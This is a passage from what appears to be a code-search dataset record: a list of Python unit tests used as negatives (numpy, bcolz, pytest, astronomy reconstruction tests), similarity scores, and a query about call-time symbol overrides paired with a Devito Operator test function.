monkeypatch.delenv(\"ORION_RESULTS_PATH\", raising=False)\n reloaded_client = reload(cli)\n\n reloaded_client.report_results(data)\n with pytest.raises(RuntimeWarning) as exc:\n reloaded_client.report_results(data)\n\n assert \"already reported\" in str(exc.value)\n assert reloaded_client.IS_ORION_ON is False\n assert reloaded_client.RESULTS_FILENAME is None\n assert reloaded_client._HAS_REPORTED_RESULTS is True", "def 
test_new_method_appendded():\n expected = True\n actual = \"breadth_first\" in dir(Graph)\n assert expected ==actual", "def test_symbol():\n token = Token(\"+\", TokenInfo(\"<stdin>\", 0, 1, \" ++\"))\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token += \"+\"\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n with pytest.raises(LythSyntaxError) as err:\n token += \"5\"\n\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n assert err.value.msg is LythError.MISSING_SPACE_AFTER_OPERATOR\n assert err.value.filename == \"<stdin>\"\n assert err.value.lineno == 0\n assert err.value.offset == 1\n assert err.value.line == \" ++\"\n\n assert repr(token) == \"Token(INC, '++', 0, 1)\"\n assert str(token) == \"INC: '++'\"" ]
[ "0.6088717", "0.5891969", "0.586841", "0.57884955", "0.57511026", "0.5713668", "0.5713668", "0.57010543", "0.5664404", "0.5631575", "0.5563887", "0.55595315", "0.55191725", "0.5508196", "0.54970926", "0.54917103", "0.5480295", "0.54737866", "0.5444322", "0.54287255", "0.54046744", "0.54034895", "0.53810966", "0.5379911", "0.5378213", "0.5367286", "0.53602266", "0.53591675", "0.535334", "0.53306067", "0.5319235", "0.5300812", "0.527999", "0.5279129", "0.52712923", "0.52664727", "0.5263024", "0.52600914", "0.5258226", "0.52566737", "0.5237043", "0.522917", "0.5220641", "0.5220635", "0.52066624", "0.5203421", "0.5202695", "0.5188272", "0.5184048", "0.5181643", "0.51728135", "0.51700836", "0.5167556", "0.516711", "0.5152917", "0.51508874", "0.5150196", "0.51345086", "0.51282895", "0.5128044", "0.5125645", "0.510673", "0.50962883", "0.50938916", "0.50938916", "0.50938916", "0.50938916", "0.50938916", "0.5092863", "0.5090393", "0.5086653", "0.5085216", "0.5082062", "0.5076482", "0.5076482", "0.5076482", "0.5071251", "0.50702786", "0.50578076", "0.50457036", "0.50437814", "0.5040636", "0.5037564", "0.5034143", "0.50310576", "0.5028927", "0.5018587", "0.5014687", "0.5013695", "0.5008245", "0.5002571", "0.49975175", "0.4996194", "0.4996194", "0.49905857", "0.49890167", "0.49854016", "0.49830416", "0.49826092", "0.49784058" ]
0.58977205
1
Test calltime symbols overrides with numpy arrays
def test_override_array(self): i, j, k, l = dimify('i j k l') shape = tuple(d.size for d in (i, j, k, l)) a = symbol(name='a', dimensions=(i, j, k, l), value=2.) a1 = np.zeros(shape=shape, dtype=np.float32) + 3. a2 = np.zeros(shape=shape, dtype=np.float32) + 4. op = Operator(Eq(a, a + 3)) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1, np.zeros(shape) + 6)) assert(np.allclose(a2, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_TimeArray_repr():", "def test_format_signature_numpy():", "def test_TimeArray_convert_unit():", "def test_TimeArray_copyflag():\r\n\r\n #These two should both generate a TimeArray, with one picosecond.\r\n #This one holds time_unit='s'\r\n t1 = ts.TimeArray(np.array([1], dtype=np.int64), copy=False)\r\n #This one holds time_unit='ps':\r\n t2 = ts.TimeArray(1, time_unit='ps')\r\n t3 = ts.TimeArray(t2, copy=False)\r\n npt.assert_equal(t1, t2)\r\n npt.assert_equal(t2.ctypes.data, t3.ctypes.data)", "def test_test_arraypointertype(self):\n input = \"\"\"\n void main () {\n float arr[3];\n arr[2]=1.5;\n foo(arr);\n arr[2] = foo(arr)[2] + 1.1;\n putFloatLn(arr[2]);\n }\n float[] foo(float x[]){\n x[2] = 5.1;\n return x;\n }\n \"\"\"\n expect = \"6.2\\n\"\n self.assertTrue(TestCodeGen.test(input,expect,571))", "def test_isarray_gtiff(self):\n self.assertIsInstance(_test_array(landsat_gtiff), np.ndarray)", "def test_isarray_vrt(self):\n self.assertIsInstance(_test_array(landsat_vrt), np.ndarray)", "def test_numpy_arrays_not_copied(self):\n with PhysicsEngineHarness('tests/engineering-test.json') as physics_engine:\n state = physics_engine.get_state()\n\n engineering = state.engineering\n engineering.components[0].temperature = 777777.7\n self.assertEqual(engineering._array[2 * N_COMPONENTS], 777777.7)\n self.assertEqual(state.y0()[state.ENGINEERING_START_INDEX + 2 * N_COMPONENTS], 777777.7)", "def lookup_array(self, *args, **kwargs): # real signature unknown\n pass", "def lookup_array(self, *args, **kwargs): # real signature unknown\n pass", "def test_numpy_ops(self):\n\n arr = np.array([1, 2, 3])\n c = Column('a', arr)\n eq = c == arr\n assert np.all(eq)\n assert len(eq) == 3\n assert type(eq) == Column\n assert eq.dtype.str == '|b1'\n eq = arr == c\n assert np.all(eq)\n\n lt = c - 1 < arr\n assert np.all(lt)", "def test_Sobol_G_raises_error_if_values_not_numpy_array():\n fixture = [list(range(8)), str(12345678)]\n for x in fixture:\n evaluate(x)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test11(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), bcolz.carray(b)\n if self.vm == \"python\":\n cr = bcolz.eval(\"np.sin(c) + 2 * np.log(d) - 3\")\n elif self.vm == \"dask\":\n cr = bcolz.eval(\"da.sin(c) + 2 * da.log(d) - 3\")\n else:\n cr = bcolz.eval(\"sin(c) + 2 * log(d) - 3\")\n nr = np.sin(a) + 2 * np.log(b) - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_allclose(cr[:], nr, err_msg=\"eval does not work correctly\")", "def test_reference_to_array(self):\n arr = numpy.arange(0.0, 10.0, 0.1)\n arr = numpy.reshape(arr, (25, 4))\n vtk_arr = array_handler.array2vtk(arr)\n arr1 = array_handler.vtk2array(vtk_arr)\n # Now make sure these are using the same memory.\n arr[0][0] = 100.0\n self.assertEqual(arr[0][0], arr1[0][0])\n self.assertEqual(arr.shape, arr1.shape)", "def test02(self):\n a = np.arange(3, self.N, 4)\n ac = bcolz.arange(3, self.N, 4, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test_timearray_var_prod():\r\n a = ts.TimeArray(list(range(10)))\r\n npt.assert_raises(NotImplementedError, a.var)\r\n npt.assert_raises(NotImplementedError, a.prod)", "def test_equitability(self):\n c = array([5])\n self.assertFloatEqual(equitability(c), 0)\n c = array([5,5])\n self.assertFloatEqual(equitability(c), 1)\n c = array([1,1,1,1,0])\n 
self.assertEqual(equitability(c), 1)", "def test00(self):\n a = np.arange(self.N)\n ac = bcolz.arange(self.N, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test_operation_arg_array(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"float array A =\\n\\t1, 5\\nGaussian(means=A) | 0\\n\")\n assert np.all(bb.operations[0][\"kwargs\"][\"means\"] == np.array([[1, 5]]))", "def with_numpy(func):\r\n return func", "def _test1():\n sys.argv.append('--Numeric')\n from . import numpytools as N\n verify(N)\n sys.argv[-1] = '--numarray'\n reload(N)\n verify(N)\n sys.argv[-1] = '--numpy'\n reload(N)\n verify(N)", "def test_op_isub_array_float(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1, 4711 * 1024, dtype=float)\n o = a + 1.3\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_o = stream.bind(o)\n offl_a -= o\n offl_a.update_host()\n r = offl_a.array\n stream.sync()\n\n self.assertTrue((r != old_a).all(),\n \"Array operand must be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def __call__(self, par_dict: dict) -> np.ndarray:", "def test_ndarray_copy(self):\r\n assert copy(numpy.ndarray) is numpy.ndarray\r\n assert deepcopy(numpy.ndarray) is numpy.ndarray", "def test01(self):\n a = np.arange(3, self.N)\n ac = bcolz.arange(3, self.N, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test03(self):\n a = np.arange(self.N, dtype=\"i1\")\n ac = bcolz.arange(self.N, dtype=\"i1\", rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def numpy_extension():\n jsonpickle.ext.numpy.register_handlers()\n yield # control to the test function.\n jsonpickle.ext.numpy.unregister_handlers()", "def test06(self):\n dtype = np.dtype(\"object\")\n a = np.array([\"ale\", \"e\", \"aco\"], dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertEqual(ac.dtype, dtype)\n self.assertEqual(a.dtype, ac.dtype)\n assert_array_equal(a, ac, \"Arrays are not equal\")", "def test_array_spec_no_match():\n fcode = \"call hello()\"\n with pytest.raises(NoMatchError):\n Fortran2003.Ac_Spec(fcode)", "def test_TimeArray_init_int64():\r\n time = ts.TimeArray(np.int64(1))\r\n npt.assert_equal(time.__repr__(), '1.0 s')\r\n\r\n pass", "def test_equal13():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_dtype_cache(self):\r\n\r\n start, stop, step = iscalars('start', 'stop', 'step')\r\n out1 = arange(start, stop, step)\r\n out2 = arange(start, stop, step, dtype=out1.dtype)\r\n out3 = arange(start, stop, 2., dtype=out1.dtype)\r\n out4 = arange(start, stop, 2.)\r\n\r\n assert out1.owner.op is out2.owner.op\r\n assert out2.owner.op is out3.owner.op\r\n assert out3.owner.op is not out4.owner.op", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test__chk_asarray(self):\r\n\r\n exp = (array([[1, 1, 1, 
1], [2, 2, 2, 2], [3, 3, 3, 3]]), 0)\r\n obs = _chk_asarray([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]], 0)\r\n assert_almost_equal(obs[0], exp[0])\r\n self.assertEqual(obs[1], exp[1])", "def test_array_storage(self):\n for array_idx in range(5):\n cum_time_array = [0, 0, 0, 0, 0]\n max_time_array = [(0, ''), (0, ''), (0, ''), (0, ''), (0, '')]\n MockDatetimeNow.RETURN_VALUES = [datetime(1970, 1, 1, 0, 0, 0, 0),\n datetime(1970, 1, 1, 0, 0, 4, 200000)]\n MockDatetimeNow.CURRENT_IDX = 0\n with self.subTest(array_idx=array_idx), patch('mpire.utils.datetime', new=MockDatetimeNow), \\\n TimeIt(cum_time_array, array_idx, max_time_array):\n pass\n self.assertListEqual([t for idx, t in enumerate(cum_time_array) if idx != array_idx], [0, 0, 0, 0])\n self.assertListEqual([t for idx, t in enumerate(max_time_array) if idx != 2],\n [(0, ''), (0, ''), (0, ''), (0, '')])\n self.assertEqual(cum_time_array[array_idx], 4.2)\n self.assertGreaterEqual(max_time_array[2], (4.2, None))", "def test_good_array(self):\n # Setup test\n filename = os.path.join(_SAMPLE_FILES_DIR, \"reg_good_ddt_array.xml\")\n out_name = \"physics_types_ddt_array\"\n out_source_name = out_name + '.F90'\n out_meta_name = out_name + '.meta'\n in_source = os.path.join(_SAMPLE_FILES_DIR, out_source_name)\n in_meta = os.path.join(_SAMPLE_FILES_DIR, out_meta_name)\n out_source = os.path.join(_TMP_DIR, out_source_name)\n out_meta = os.path.join(_TMP_DIR, out_meta_name)\n remove_files([out_source, out_meta])\n # Run dycore\n retcode, files = gen_registry(filename, 'se', {}, _TMP_DIR, 2,\n _SRC_MOD_DIR, _CAM_ROOT,\n loglevel=logging.ERROR,\n error_on_no_validate=True)\n # Check return code\n amsg = \"Test failure: retcode={}\".format(retcode)\n self.assertEqual(retcode, 0, msg=amsg)\n flen = len(files)\n amsg = \"Test failure: Found {} files, expected 1\".format(flen)\n self.assertEqual(flen, 1, msg=amsg)\n amsg = \"{} does not exist\".format(out_meta)\n self.assertTrue(os.path.exists(out_meta), msg=amsg)\n amsg = \"{} does not exist\".format(out_source)\n self.assertTrue(os.path.exists(out_source), msg=amsg)\n # For each output file, make sure it matches input file\n amsg = \"{} does not match {}\".format(in_meta, out_meta)\n self.assertTrue(filecmp.cmp(in_meta, out_meta,\n shallow=False), msg=amsg)\n amsg = \"{} does not match {}\".format(in_source, out_source)\n self.assertTrue(filecmp.cmp(in_source, out_source,\n shallow=False), msg=amsg)", "def test_override_symbol(self):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def test_Sobol_G_raises_error_if_values_not_numpy_array():\n fixture = [list(range(8)), str(12345678)]\n for x in fixture:\n with raises(TypeError):\n evaluate(x)", "def test_of_agreement(self): \n \n pop_t = world.pop_t \n pop_sub = world.pop_sub \n \n \n Ns = world.subtime.length\n \n dt = world.time.step\n ds = world.subtime.step\n N = round(ds/dt)\n for i in range(Ns):\n numpy.testing.assert_allclose(pop_sub[:,i],pop_t[i*N,:])", "def state_array_spec(self) -> Dict[str, Any]:", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with 
pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def __call__(self, array, axis=None):\n raise NotImplementedError()", "def test_reconstruction_against_simulation(subarray_and_event_gamma_off_axis_500_gev):\n\n # 4-LST bright event already calibrated\n # we'll clean it and parametrize it again in the TelescopeFrame\n subarray, event = subarray_and_event_gamma_off_axis_500_gev\n\n # define reconstructor\n reconstructor = HillasReconstructor(subarray)\n\n hillas_dict = {}\n telescope_pointings = {}\n\n for tel_id, dl1 in event.dl1.tel.items():\n\n telescope_pointings[tel_id] = SkyCoord(\n alt=event.pointing.tel[tel_id].altitude,\n az=event.pointing.tel[tel_id].azimuth,\n frame=AltAz(),\n )\n\n geom_CameraFrame = subarray.tel[tel_id].camera.geometry\n\n # this could be done also out of this loop,\n # but in case of real data each telescope would have a\n # different telescope_pointing\n geom_TelescopeFrame = geom_CameraFrame.transform_to(\n TelescopeFrame(telescope_pointing=telescope_pointings[tel_id])\n )\n\n mask = tailcuts_clean(\n geom_TelescopeFrame,\n dl1.image,\n picture_thresh=5.0,\n boundary_thresh=2.5,\n keep_isolated_pixels=False,\n min_number_picture_neighbors=2,\n )\n\n try:\n hillas_dict[tel_id] = hillas_parameters(\n geom_TelescopeFrame[mask], dl1.image[mask]\n )\n\n # the original event is created from a\n # pytest fixture with \"session\" scope, so it's always the same\n # and if we used the same event we would overwrite the image\n # parameters for the next tests, thus causing their failure\n test_event = deepcopy(event)\n test_event.dl1.tel[tel_id].parameters = ImageParametersContainer()\n test_event.dl1.tel[tel_id].parameters.hillas = hillas_dict[tel_id]\n\n except HillasParameterizationError as e:\n print(e)\n continue\n\n # Get shower geometry\n reconstructor(event)\n # get the result from the correct DL2 container\n result = event.dl2.stereo.geometry[\"HillasReconstructor\"]\n\n # get the reconstructed coordinates in the sky\n reco_coord = SkyCoord(alt=result.alt, az=result.az, frame=AltAz())\n # get the simulated coordinates in the sky\n true_coord = SkyCoord(\n alt=event.simulation.shower.alt, az=event.simulation.shower.az, frame=AltAz()\n )\n\n # check that we are not more far than 0.1 degrees\n assert reco_coord.separation(true_coord) < 0.1 * u.deg", "def setUp(self):\n def compare_numpy_ndarrays(x, y, msg=None):\n if not (x == y).all():\n message = \"Arrays are not equal ({} entries differ)\" \\\n .format(np.count_nonzero(x - y))\n if msg is not None:\n message += \", \"+msg\n raise self.failureException(message)\n self.addTypeEqualityFunc(np.ndarray, compare_numpy_ndarrays)", "def test_get_flag_array_no_squeeze():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n flag_array = utils.get_flag_array(test_uv, reds=baseline_array, squeeze=False)\n\n test_flags = np.zeros(\n (test_uv.Npols, test_uv.Nbls, test_uv.Ntimes, test_uv.Nfreqs),\n dtype=np.float32,\n )\n\n pol_array = uvutils.polnum2str(test_uv.polarization_array)\n for pol_cnt, pol in enumerate(pol_array):\n for cnt, baseline in enumerate(list(set(test_uv.baseline_array))):\n ant_1, ant_2 = test_uv.baseline_to_antnums(baseline)\n test_flags[pol_cnt, cnt] = 
test_uv.get_flags(ant_1, ant_2)\n\n assert np.all(test_flags == flag_array)", "def check_array(self, v, t):\n raise NotImplementedError('check_array')", "def test_op_sub_array_float(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1.0, 4711.0 * 1024, dtype=float)\n o = a + 1.0\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_r = offl_a - o\n offl_a.update_host()\n r = offl_r.update_host().array\n stream.sync()\n\n self.assertEqual(r.shape, a.shape)\n self.assertEqual(r.dtype, a.dtype)\n self.assertTrue((a == old_a).all(),\n \"Input array operand 1 must not be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def test_get_flag_array():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n flag_array = utils.get_flag_array(test_uv, reds=baseline_array)\n\n test_flags = np.zeros(\n (test_uv.Npols, test_uv.Nbls, test_uv.Ntimes, test_uv.Nfreqs),\n dtype=np.float32,\n )\n\n pol_array = uvutils.polnum2str(test_uv.polarization_array)\n for pol_cnt, pol in enumerate(pol_array):\n for cnt, baseline in enumerate(list(set(test_uv.baseline_array))):\n ant_1, ant_2 = test_uv.baseline_to_antnums(baseline)\n test_flags[pol_cnt, cnt] = test_uv.get_flags(ant_1, ant_2)\n\n test_flags = np.squeeze(test_flags, axis=0)\n assert np.all(test_flags == flag_array)", "def __array_interface__(self):\n ...", "def __array_interface__(self):\n ...", "def test02(self):\n dtype = np.dtype(\"f4,f8\")\n a = np.ones(30000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")", "def test_asarraylike_array():\n arr = np.array([1, 2, 3, 4])\n result = util.asarraylike(arr)\n\n assert result is arr", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_invalid_events(subarray_and_event_gamma_off_axis_500_gev):\n\n # 4-LST bright event already calibrated\n # we'll clean it and parametrize it again in the TelescopeFrame\n subarray, event = subarray_and_event_gamma_off_axis_500_gev\n\n tel_azimuth = {}\n tel_altitude = {}\n\n #source = EventSource(filename, max_events=1)\n #subarray = source.subarray\n calib = CameraCalibrator(subarray)\n fit = 
HillasReconstructor(subarray)\n\n #for event in source:\n\n calib(event)\n\n hillas_dict = {}\n for tel_id, dl1 in event.dl1.tel.items():\n\n geom = subarray.tel[tel_id].camera.geometry\n tel_azimuth[tel_id] = event.pointing.tel[tel_id].azimuth\n tel_altitude[tel_id] = event.pointing.tel[tel_id].altitude\n\n mask = tailcuts_clean(\n geom, dl1.image, picture_thresh=10.0, boundary_thresh=5.0\n )\n\n dl1.parameters = ImageParametersContainer()\n\n try:\n moments = hillas_parameters(geom[mask], dl1.image[mask])\n hillas_dict[tel_id] = moments\n dl1.parameters.hillas = moments\n except HillasParameterizationError:\n dl1.parameters.hillas = HillasParametersContainer()\n continue\n\n # copy event container to modify it\n event_copy = deepcopy(event)\n # overwrite all image parameters but the last one with dummy ones\n for tel_id in list(event_copy.dl1.tel.keys())[:-1]:\n event_copy.dl1.tel[tel_id].parameters.hillas = HillasParametersContainer()\n fit(event_copy)\n assert event_copy.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False\n\n # Now use the original event, but overwrite the last width to 0\n event.dl1.tel[tel_id].parameters.hillas.width = 0 * u.m\n fit(event)\n assert event.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False\n\n # Now use the original event, but overwrite the last width to NaN\n event.dl1.tel[tel_id].parameters.hillas.width = np.nan * u.m\n fit(event)\n assert event.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False", "def test04(self):\n a = np.array([\"ale\", \"e\", \"aco\"], dtype=\"S4\")\n ac = bcolz.carray(a, dtype='S4')\n self.assertTrue(ac.dtype == np.dtype('S4'))\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac, \"Arrays are not equal\")", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_observed_species(self):\n c = array([4,3,4,0,1,0,2])\n obs = observed_species(c)\n exp = 5\n self.assertEqual(obs, exp)\n c = array([0,0,0])\n obs = observed_species(c)\n exp = 0\n self.assertEqual(obs, exp)\n self.assertEqual(observed_species(self.TestData), 9)", "def a_subarray_in_the_idle_state():", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test10(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n c[\"a + 2 * d - 3 > 1000\"] = 0\n a[(a + 2 * b - 3) > 1000] = 0\n # print \"carray ->\", c\n # print \"numpy ->\", a\n assert_array_equal(c[:], a, \"carray[expr] = v does not work correctly\")", "def test_method_reference_from_array_type(self):\n self.assert_contains_method_reference_expression_in_m(\n parse.parse(setup_java_class(\"int[]::new;\")))", "def test_equal10():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_run_a_scan_on_sdp_subarray_in_low():", "def test_equal9():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([True, False, True])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_simple(self):\n with self.subTest(\"from np array\"):\n data = np.random.rand(10, 4)\n mask = np.ones((10, 4))\n channels = [\"a\", \"b\", \"c\", \"d\"]\n fcs.FCSData((data, mask), 
channels=channels)", "def test_pyarma_wrapper(self):\n v = get_static_vec()\n assert np.all(v==np.zeros(3))\n assert v.flags['F_CONTIGUOUS']\n assert not v.flags['OWNDATA']", "def test_exception_method_not_implemented(local_registry, numpy_array, method):\n q = local_registry.Quantity(numpy_array, units_)\n\n exctruth = (\n f\"Method {method} only implemented for objects of\"\n \" <class 'dask.array.core.Array'>, not\"\n \" <class 'numpy.ndarray'>\"\n )\n with pytest.raises(AttributeError, match=exctruth):\n obj_method = getattr(q, method)\n obj_method()", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def check_array_pointer(self, register: str, value: List[int]):\n assert self._call is not None, f\"You must first call a function before checking its return values!\"\n \"\"\" Checks that when this function is called, we have not already assembled and run the test. \"\"\"\n assert not self._has_executed, f\"Test has already been assembled and run!\"\n assert len(value) > 0, \"Array to compare against has to contain at least one element.\"\n saved_register = self._parse_register(register)\n array_name = f\"array pointed to by {register}\"\n expected = self.array(value).name\n actual = f\"mv a2 {saved_register}\"\n self._compare_int_array(array_name, actual, expected, value, exit_code = 2)", "def test_zero_to_one_element(self):\n\n f = Foo()\n f.a = numpy.zeros((2,), float)\n f.event_fired = False\n\n # Change the array.\n f.a = numpy.concatenate((f.a, numpy.array([100])))\n\n # Confirm that the static trait handler was invoked.\n self.assertEqual(f.event_fired, True)\n\n return", "def test_surrogate_array():\n # We can't use random positions, as the positions have to be\n # far-enough not to overlap.\n pos = np.array([[ 2, 10],\n [10, 4],\n [80, 30],\n [40, 60],\n [90, 70]])\n ampli = np.random.random(5)\n data = make_surrogate_array(nbsubj=1, noise_level=0, spatial_jitter=0,\n signal_jitter=0, pos=pos, dimx=100,\n dimy=100, ampli=ampli).squeeze()\n x, y = pos.T\n np.testing.assert_array_equal(data[x, y], ampli)", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def __init__(self, strict=True):\n self.strict = strict\n self.testwithoutnp = test_without_numpy()", "def with_numpy(func):\r\n def my_func():\r\n raise nose.SkipTest('Test requires numpy')\r\n return my_func", "def test_arr2cell_array(self):\n # Test list of lists.\n a = [[0], [1, 2], [3, 4, 5], [6, 7, 8, 9]]\n cells = array_handler.array2vtkCellArray(a)\n z = numpy.array([1, 0, 2, 1,2, 3, 3,4,5, 4, 6,7,8,9])\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(len(arr.shape), 1)\n self.assertEqual(len(arr), 14)\n\n # Test if optional argument stuff also works.\n cells = vtk.vtkCellArray()\n ident = id(cells)\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(id(cells), ident)\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Make sure this resets the cell array and does not add to the\n # existing list!\n cells = 
